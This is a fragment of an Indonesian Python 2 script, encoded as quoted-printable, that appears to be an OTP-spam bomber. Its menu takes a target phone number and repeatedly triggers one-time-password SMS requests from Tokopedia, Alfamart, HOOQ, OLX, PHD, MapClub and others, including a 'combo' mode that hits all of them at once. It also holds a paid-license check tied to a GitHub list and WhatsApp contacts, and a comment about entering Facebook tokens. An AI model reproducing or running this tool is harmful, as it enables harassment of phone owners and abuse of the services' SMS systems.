		Tik(C+'['+W+'5'+C+']'+W+' SPAM OTP TOKOPEDIA'+W+'\t3X / 1 HARI'+W+'\tACT=
IVE'+H+' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'6'+C+']'+W+' SPAM OTP ALFAMART'+W+'\t4X / 1 HARI'+W+'\tACTI=
VE'+H+' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'7'+C+']'+W+' SPAM OTP PHD'+W+'\t3X / 1 HARI'+W+'\tACTIVE'+H=
+' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'8'+C+']'+W+' COMBO ALL 3 OTP'+K+'\t    -\t\t'+W+'ACTIVE'+H+=
' \xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'9'+C+']'+W+' REPORT BUG'+K+'\t\t    -\t\t'+W+'ACTIVE'+H+' \=
xE2\x9C\x94')
		Tik(C+50*'=3D')
		Tik(C+'['+W+'X'+C+']'+W+' EXIT / KELUAR'+K+'\t    -\t\t'+W+'ACTIVE'+H+' =
\xE2\x9C\x94')
		print
		print
		try:
			requests.get('http://google.com')
	
		except ConnectionError:
			print
			print(M+'CEK KONEKSI JARINGAN !')
			sys.exit()
		
		PilihTools =3D raw_input(W+'Pilih Tools'+C+' ~> '+W+'')
		
		if PilihTools =3D=3D '1':
			try:
			
				print
				Tik(W+'SPAM OTP MAPCLUB')
				Tik(C+''+16*'=3D')
				print
				Phone =3D raw_input(W+'NOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+') :=
 ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'JUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : ')
				if Amount > 10:
					print
					print(W+'\tJANGAN BANYAK BANYAK KALO GAK'+C+'\n\tMAU TOOLS INI MATI'+=
W+' ^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (h+'Mohon menunggu.....')
				print
				MapClub(Phone, Amount)
				print
				time.sleep(10)
				menu_spam()
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
		elif PilihTools =3D=3D '2':
			try:
			
				print
				Tik(W+'\t\tSPAM OTP HOOQ')
				Tik(C+'\t\t'+13*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'\tJUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : =
')
				if Amount > 5:
					print
					print(W+'\tJANGAN BANYAK BANYAK KALO GAK'+C+'\n\tMAU TOOLS INI MATI'+=
W+' ^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				Hooq(Phone, Amount)
				print
				time.sleep(10)
				menu_spam()
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
			
		elif PilihTools =3D=3D '3':
			try:
			
				print
				Tik(W+'\t\tSPAM OTP HARVEST')
				Tik(C+'\t\t'+17*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'\tJUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : =
')
				if Amount > 5:
					print
					print(W+'\tJANGAN BANYAK BANYAK KALO GAK'+C+'\n\tMAU TOOLS INI MATI'+=
W+' ^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
			
		elif PilihTools =3D=3D '4':
			try:
			
				print
				Tik(W+'\t\tSPAM OTP OLX')
				Tik(C+'\t\t'+12*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'\tJUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : =
')
				if Amount > 10:
					print
					print(W+'\tJANGAN BANYAK BANYAK KALO GAK'+C+'\n\tMAU TOOLS INI MATI'+=
W+' ^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
	
		elif PilihTools =3D=3D '5':
			try:
			
				print
				Tik(W+'\t\tSPAM OTP TOKOPEDIA')
				Tik(C+'\t\t'+19*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'\tJUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : =
')
				if Amount > 5:
					print
					print(W+'\tUDAH LEWAT LIMIT ITU JUMLAHNYA'+C+'^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
			
		elif PilihTools =3D=3D '6':
			try:
			
				print
				Tik(W+'\t\tSPAM OTP ALFAMART')
				Tik(C+'\t\t'+17*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				Phone =3D int(Phone) 
			
				Amount =3D input(''+W+'\tJUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : =
')
				if Amount > 5:
					print
					print(W+'\tUDAH LEWAT LIMIT ITU JUMLAHNYA'+C+'^_^')
					print
					sys.exit()
				
				else:
					pass
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
				
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
			
		elif PilihTools =3D=3D '7':
			try:
				print
				Tik(W+'\t\tSPAM OTP PHD')
				Tik(C+'\t\t'+12*'=3D')
				print
				Phone =3D raw_input(W+'\tNOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+')=
 : ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
			
				else:
					pass
				
				Phone =3D int(Phone) 
				print
				print(C+'PHD'+W+' AUTO 3X SEND') 
				sleep(2)
				
				print
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
				print(W+'JIKA TIDAK TERKIRIM, BERARTI SUDAH LIMIT !')
				print
				Phd(Phone, 3) # DON'T CHANGE / JANGAN DI UBAH
		
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
			
		elif PilihTools =3D=3D '8':
			try:
			
				print
				Tik(W+'SPAM COMBO OTP')
				Tik(C+''+14*'=3D')
				print
				Phone =3D raw_input(W+'NOMOR TARGET ('+H+' Ex :'+C+' 0812xxxx '+W+') :=
 ')
			
				if len(Phone) < 9:
					print
					print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
					sys.exit()
				
				else:
					pass
				
				jalan (H+'Mohon menunggu.....')
				print
				time.sleep(10)
				menu_spam()
				print(C+'\t----------- '+W+'HOOQ 3X'+C+' -----------')
				print
				Hooq(Phone, 3)
				print
				print(C+'\t----------- '+W+'HARVEST 3X'+C+' -----------')
				print
				HarVest(Phone, 3)
				print
				print(C+'\t----------- '+W+'OLX 3X'+C+' -----------')
				print
				Olx(Phone, 3)
				print
				print(C+'\t----------- '+W+'TOKOPEDIA 3X'+C+' -----------')
				print
				Tokped(Phone, 3)
				print
				print(C+'\t----------- '+W+'ALFAMART 3X'+C+' -----------')
				print
				AlfaMart(Phone, 3)
				print
				print(C+'\t----------- '+W+'PHD 3X'+C+' -----------')
				print
				Phd(Phone, 3)
				print
				print(C+'\t----------- '+W+'MAPCLUB 3X'+C+' -----------')
				print
				MapClub(Phone, 3)
				print
				print(W+'Thanks Udah Coba Combo'+C+' ^_^')
				sys.exit()
			
			except ValueError:
				print
				print(W+'NOMOR TIDAK VALID'+M+' \xE2\x9C\x96')
				sys.exit()
			
			except SyntaxError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except NameError:
				print
				print(W+'HARUS ANGKA'+M+' \xE2\x9C\x96')
				sys.exit()
		
			except ConnectionError:
				print
				print(M+'TERJADI KESALAHAN JARINGAN !')
				sys.exit()
		
		elif PilihTools =3D=3D '9':
			os.system('xdg-open http://wa.me/6285880818385?text=3DHallo')
		
		elif PilihTools =3D=3D 'X' or PilihTools =3D=3D 'x':
			print
			print(W+'Terima kasih.....'+C+' ^_^')
			sys.exit()
			
		else:
			print
			print(W+'Tools Tidak Di Temukan'+C+' ^_^')
			sys.exit()

except ImportError:
	os.system('clear')
	print(C+'Module Belum Terpasang'+W+' ^_^')
	print(W+'Install Module'+C+' ...')
	sleep(0.01)
	print
	os.system('pip2 install -r requirements.txt')
	print
	print(C+'Selesai'+W+' ^_^') 
	sleep(0.01)
	os.system('clear')


def tik():
    titik =3D [
     '.   ', '..  ', '... ']
    for o in titik:
        print '\r\x1b[1;96m [\033[1;97m*\033[1;96m]\033[1;97m Memeriksa Li=
sensi ' + o,
        sys.stdout.flush()
        time.sleep(1)
        
def lisen():
    os.system('clear')
    logo()
    jalan('\n\x1b[1;97m [*] Mohon tunggu ...');time.sleep(1.0)
    id =3D uuid.uuid4().hex[:25]
    idg =3D open('licensed.log', 'w')
    idg.write(id)
    idg.close()
    jalan ('\n\033[1;96m [\033[1;97m*\033[1;96m]\033[1;97m Lisensi : \x1b[=
96m' + id)
    time.sleep(0.07)
    jalan ('\x1b[1;91m [*] Lisensi Belum Di konfirmasi\x1b[1;39m')
    time.sleep(0.07)
    jalan ('\033[1;96m [\033[1;97m*\033[1;96m] \033[1;97mChat Admin Untuk =
Mengkonfirmasi Lisensi\x1b[1;39m')
    time.sleep(0.07)
    raw_input('\n\x1b[1;97m [*] Tekan Enter ')
    os.system('am start https://wa.me/+62895341157823?text=3DHi+Ratu+Beli+=
Lisensi+dong.%20Lisensi:%20' + id + ' >/dev/null') 
    time.sleep(1)
    os.sys.exit()
def user1():
    try:
        j =3D open('licensed.log', 'r').read()
        r =3D requests.get('https://github.com/bucin25/License/blob/main/i=
d').text.strip() # Jangan Di ganti bro'i nanti error
        if j in r:
            os.system('clear')
            logo()
            tik()
            jalan('\n\033[1;96m [\033[1;97m*\033[1;96m]\033[1;97m Lisensi =
\033[1;92mTersedia =E2=9C=93')
            time.sleep(1)
            pilihlogin()
        else:
            os.system('clear')
            logo()
            tik()
            jalan ('\n\x1b[1;91m [*] Lisensi Tidak Tersedia !')
            time.sleep(1)
            lisen()
            jalan ('\033[1;96m [\033[1;97m*\033[1;96m]\033[1;97m Chat Admi=
n Untuk Mengkonfirmasi Lisensi\x1b[1;39m')
            time.sleep(0.07)
            raw_input('\n\x1b[1;97m [*] Tekan Enter ')
            os.system('am start https://wa.me/+62895341157823?text=3DHi+Ra=
tu+Beli+Lisensi+dong.%20Lisensi:%20' + j + ' >/dev/null')
            os.sys.exit()
    except requests.exceptions.ConnectionError:
    	os.system('clear')
        print '\x1b[1;91m [!] Tidak Ada Koneksi Data\x1b[0;97m'
        os.sys.exit()
    except KeyboardInterrupt:
        os.sys.exit()
    except IOError:
        subprocess.Popen(['rm', '-rf', 'licensed.log'])
        romz()
        
def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.01)
		
def logo():
	time.sleep (0.01)
	print
	print
 	jalan ('\033[1;37m                    ______---_____ ')
  	jalan ('\033[1;37m         ___-----           __      ----_ ')
	jalan ('\033[1;37m ___---             ___------             \ ')
	jalan ('\033[1;37m     ---______        ----                 \ ')
	jalan ('\033[1;37m                 --__    |             _____) ')
	jalan ('\033[1;37m                     -                /     \ ')
	jalan ('\033[1;37m          _____-----    ___--         \    /)\ ')
	jalan ('\033[1;37m    -----_____      ---____            \__/  / ')
	jalan ('\033[1;37m                 --__    \ --    _          /\ ')
	jalan ('\033[1;37m                      --__-__     \_____/   \_/\ ')
	jalan ('\033[1;37m                            ----|   /          | ')
	jalan ('\033[1;36mAuthor \033[1;37m : JESSICA PUTRY         |  |_________=
__| ')
	jalan ('\033[1;36mGelar  \033[1;37m : RATU ERROR            |  | ((_(_)| =
)_) ')
	jalan ('\033[1;36mJabatan\033[1;37m : \33[3;1m\033[1;37mOwner group \033[=
1;33mR.E...... \33[0;1m\033[1;37m|  \_((_(_)|/(_) ')
	jalan ('\033[1;36m=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=
=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=
=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4\033[1=
;37m\             ( ')
	jalan ('\033[1;36m=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=
=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=
=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=C2=A4=
\033[1;37m\_____________)')
	print
	
	
def logo_():
	#os.system("clear")
	print(""" \x1b[1;36m\n     =E2=94=8F=E2=94=81=E2=94=81=E2=94=81=E2=94=B3=
=E2=94=81=E2=94=81=E2=94=81=E2=94=B3=E2=94=81=E2=94=81=E2=94=81=E2=94=81=E2=
=94=B3=E2=94=93 =E2=94=8F=E2=94=93 =E2=94=8F=E2=94=81=E2=94=81=E2=94=81=E2=
=94=B3=E2=94=81=E2=94=81=E2=94=81=E2=94=B3=E2=94=81=E2=94=81=E2=94=81=E2=94=
=B3=E2=94=81=E2=94=81=E2=94=81=E2=94=B3=E2=94=81=E2=94=81=E2=94=81=E2=94=93
     \x1b[1;37m=E2=94=83=E2=94=8F=E2=94=81=E2=94=93=E2=94=83=E2=94=8F=E2=
=94=81=E2=94=93=E2=94=83=E2=94=8F=E2=94=93=E2=94=8F=E2=94=93=E2=94=83=E2=94=
=83 =E2=94=83=E2=94=83 =E2=94=83=E2=94=8F=E2=94=81=E2=94=81=E2=94=AB=E2=94=
=8F=E2=94=81=E2=94=93=E2=94=83=E2=94=8F=E2=94=81=E2=94=93=E2=94=83=E2=94=8F=
=E2=94=81=E2=94=93=E2=94=83=E2=94=8F=E2=94=81=E2=94=93=E2=94=83
     =E2=94=83=E2=94=97=E2=94=81=E2=94=9B=E2=94=83=E2=94=83 =E2=94=83=E2=
=94=A3=E2=94=9B=E2=94=83=E2=94=83=E2=94=97=E2=94=AB=E2=94=83 =E2=94=83=E2=
=94=83 =E2=94=83=E2=94=97=E2=94=81=E2=94=81=E2=94=AB=E2=94=97=E2=94=81=E2=
=94=9B=E2=94=83=E2=94=97=E2=94=81=E2=94=9B=E2=94=83=E2=94=83 =E2=94=83=E2=
=94=83=E2=94=97=E2=94=81=E2=94=9B=E2=94=83
     =E2=94=83=E2=94=8F=E2=94=93=E2=94=8F=E2=94=AB=E2=94=97=E2=94=81=E2=94=
=9B=E2=94=83 =E2=94=83=E2=94=83 =E2=94=83=E2=94=83 =E2=94=83=E2=94=83 =E2=
=94=83=E2=94=8F=E2=94=81=E2=94=81=E2=94=AB=E2=94=8F=E2=94=93=E2=94=8F=E2=94=
=AB=E2=94=8F=E2=94=93=E2=94=8F=E2=94=AB=E2=94=83 =E2=94=83=E2=94=83=E2=94=
=8F=E2=94=93=E2=94=8F=E2=94=9B
     =E2=94=83=E2=94=83=E2=94=83=E2=94=97=E2=94=AB=E2=94=8F=E2=94=81=E2=94=
=93=E2=94=83 =E2=94=83=E2=94=83 =E2=94=83=E2=94=97=E2=94=81=E2=94=9B=E2=94=
=83 =E2=94=83=E2=94=97=E2=94=81=E2=94=81=E2=94=AB=E2=94=83=E2=94=83=E2=94=
=97=E2=94=AB=E2=94=83=E2=94=83=E2=94=97=E2=94=AB=E2=94=97=E2=94=81=E2=94=9B=
=E2=94=83=E2=94=83=E2=94=83=E2=94=97=E2=94=93
     \x1b[1;36m=E2=94=97=E2=94=9B=E2=94=97=E2=94=81=E2=94=BB=E2=94=9B =E2=
=94=97=E2=94=9B =E2=94=97=E2=94=9B =E2=94=97=E2=94=81=E2=94=81=E2=94=81=E2=
=94=9B =E2=94=97=E2=94=81=E2=94=81=E2=94=81=E2=94=BB=E2=94=9B=E2=94=97=E2=
=94=81=E2=94=BB=E2=94=9B=E2=94=97=E2=94=81=E2=94=BB=E2=94=81=E2=94=81=E2=94=
=81=E2=94=BB=E2=94=9B=E2=94=97=E2=94=81\x1b[1;36m=E2=94=9B \x1b[1;37m\n""")
     
HUT =3D '\x1b[1;34m'
H =3D '\x1b[1;37m'

#------->login token jangan lupa masukin token facebook jangan token listr=
ik kontol<-------#     
			
if __name__ =3D=3D '__main__':
	buat_folder()
	xxnx()
	pilihlogin()
